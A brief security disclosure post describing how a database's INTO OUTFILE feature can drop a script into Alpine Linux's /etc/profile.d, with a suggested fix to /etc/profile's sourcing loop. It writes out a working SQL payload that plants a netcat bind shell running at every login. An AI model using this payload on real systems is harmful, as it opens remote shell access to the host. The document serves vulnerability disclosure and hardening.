Security risks of /etc/profile
I recently found a security risk with an open source database, this database allow using INTO OUTFILE
SQL to write a file to any system path, and database Docker image default using Alpine Linux image.
In Alpine, /etc/profile loads all files in /etc/profile.d by default:
for script in /etc/profile.d/*.sh ; do
if [ -r $script ] ; then
. $script
fi
done
If the file name ends with .sh
, and the file has readable permissions, /etc/profile will be loaded. So, I can execute the following SQL statement to write a file to /etc/profile.d directory:
select '/usr/bin/nc -lp 8888 -e /bin/sh &' into outfile '/etc/profile.d/nc.sh';
nc.sh default has readable permissions.
The next time any user logs into the system, nc.sh will be executed.
It is always difficult to avoid whether the application has an arbitrary write file vulnerability and runs as root, I suggest adding another judgment execution permission, because the newly created file does not have execution permission by default:
if [ -r $script ] && [ -x $script ] ; then
. $script
fi